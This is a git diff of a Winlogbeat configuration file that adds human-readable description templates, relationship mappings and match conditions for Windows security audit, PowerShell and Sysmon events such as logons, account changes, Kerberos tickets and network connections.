diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index eb6a595a2..1d8547db9 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1,34 +1,1631 @@ [ { - "value": "Auditing event on {winlog.computer_name}: {event.action}", + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetUserSid} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserSid", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged off from {host.hostname}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged off from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4634 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {action.properties.TargetServerName} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.TargetServerName", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {host.hostname} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.TargetServerName", + "value": "localhost" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} accessed the object {action.properties.ObjectName} on {host.hostname}", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "action.properties.ObjectName", + "type": "accessed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4662 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SubjectDomainName" + }, + { + "field": "action.properties.SubjectuserName" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed {process.command_line} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "user.name", + "target": "process.parent.executable", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "jost.hostname", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.executable", + "target": "host.hostname", + "type": "executed on" + }, + { + "source": "process.parent.executable", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4688 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Process {process.name} exited. It was executed by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.executable", + "type": "executed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4689 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "created account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4720 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "enabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4722 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} changed their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "changed their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to change their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "failed to change their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} disabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "disabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4725 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} deleted account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "deleted account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4726 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4727 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4742 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created security-disabled local group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created security-disabled local group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4744 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about the security-disabled global group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4750 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to authenticate from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to log authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} successfully authenticated from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "authenticated from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was denied a service ticket for {action.properties.ServiceName} from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was denied a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was granted a service ticket for {action.properties.ServiceName} from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was granted a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4771 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate on {action.properties.Workstation} (Reason: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{action.properties.TargetUserName} successfully authenticated on {action.properties.Workstation}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated local groups of {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated local groups of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4798 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated members of local group {action.properties.TargetUserName} on {log.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated members of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4799 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Authenticated user {user.name} was denied the access to Remote Desktop to {log.hostname} from IP {action.properties.ClientAddress}", + "relationships": [ + { + "source": "user.name", + "target": "log.hostname", + "type": "wad denied RDP access to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4825 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} accessed network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "accessed network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to access network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "failed to access network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was granted access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "accessed shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was denied access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "failed to access shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.SourcePort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection to {action.properties.DestAddress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.DestPort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAddress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.SourcePort" + }, + { + "field": "action.properties.DestPort" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4103 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.id} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Started invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4105 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Completed invocation of PowerShell ScriptBlock on {host.name}", "conditions": [ { - "field": "winlog.provider_guid", - "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + "field": "action.id", + "value": 4106 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" }, { - "field": "winlog.computer_name" + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" }, { - "field": "event.action" + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" } ] }, { - "value": "Auditing event on {winlog.computer_name} for {winlog.SubjectUserSid}: {event.action}", + "value": "Process {process.executable} created by {user.domain}\\{user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], "conditions": [ { - "field": "winlog.provider_guid", - "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + "field": "action.id", + "value": 1 }, { - "field": "winlog.computer_name" + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" }, { - "field": "winlog.SubjectUserSid" + "field": "process.executable" }, { - "field": "event.action" + "field": "user.domain" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created on {host.name}", + "relationships": [ + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} changed the creation time of the file {file.name} on {host.name}", + "relationships": [ + { + "source": "process.executable", + "target": "file.name", + "type": "changed creation time of" + }, + { + "source": "process.executable", + "target": "host.name", + "type": "executed on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 2 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Network connection from {source.ip} to {destination.ip}:{destination.port} by {process.executable} on {host.name}", + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 3 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{file.name} created by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 11 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry value {action.properties.TargetObject} created by {process.executable} on {log.hostname}", + "conditions": [ + { + "field": "action.id", + "value": 12 + }, + { + "field": "action.properties.MessEventType", + "value": "CreateValue" + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry key {registry.key} set by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 13 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Sysmon configuration was updated on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 16 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{host.name} performed a DNS query for name {dns.question.name} (status: {sysmon.dns.status})", + "conditions": [ + { + "field": "action.id", + "value": 22 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Auditing event on {winlog.computer_name}: {event.action}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + } + ] + }, + { + "value": "Auditing event on {winlog.computer_name} for {winlog.SubjectUserSid}: {event.action}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" } ] }, @@ -43,9 +1640,6 @@ "field": "event.action", "value": "Filtering Platform Connection" }, - { - "field": "winlog.computer_name" - }, { "field": "winlog.event_data.SourceAddress" }, @@ -55,59 +1649,83 @@ ] }, { - "value": "Service Control Manager on {host.hostname}: {event.original}", + "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "host.hostname" + "field": "event.action", + "value": "Filtering Platform Connection" }, { - "field": "event.original" + "field": "winlog.event_data.SourceAddress" } ] }, { - "value": "Sysmon {winlog.opcode} event on {winlog.computer_name}", + "value": "Filtering connection on {winlog.computer_name} to {winlog.event_data.DestAddress}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "winlog.opcode" + "field": "event.action", + "value": "Filtering Platform Connection" }, { - "field": "winlog.computer_name" + "field": "winlog.event_data.DestAddress" } ] }, { - "value": "Sysmon : no event on {winlog.computer_name}", + "value": "Filtering connection on {winlog.computer_name}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{00000000-0000-0000-0000-000000000000}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "winlog.computer_name" + "field": "event.action", + "value": "Filtering Platform Connection" } ] }, { - "value": "Security event : {event.action} on {winlog.computer_name}", + "value": "Service Control Manager on {host.hostname}: {event.original}", "conditions": [ { "field": "winlog.provider_guid", - "value": 